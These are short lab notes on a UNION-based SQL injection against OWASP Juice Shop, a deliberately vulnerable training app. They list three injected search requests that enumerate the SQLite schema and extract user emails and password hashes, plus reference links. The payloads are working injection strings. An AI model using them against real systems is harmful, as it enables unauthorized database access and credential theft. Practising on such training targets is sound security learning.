burp suite union attack owasp juice shop

obtain table names from sqlite_master with union injection

GET /rest/products/search?q=apple'))UNION%20SELECT%20tbl_name,2,3,4,5,6,7,8,9%20from%20sqlite_schema-- 

 

found Users table in previous step, obtain columns from Users table

GET /rest/products/search?q=apple'))UNION%20SELECT%20sql,2,3,4,5,6,7,8,9%20from%20sqlite_schema-- 

found column name email, password from previous step, obtain login info from Users table

GET /rest/products/search?q=apple'))UNION%20SELECT%20email,password,3,4,5,6,7,8,9%20from%20Users-- 

reference:

https://www.youtube.com/watch?v=0-D-e66U2Z0&list=PL8j1j35M7wtKXpTBE6V1RlN_pBZ4StKZw&index=24

sqlite_schema

CREATE TABLE sqlite_schema(

  type text,

  name text,

  tbl_name text,

  rootpage integer,

  sql text

);

https://www.sqlite.org/schematab.html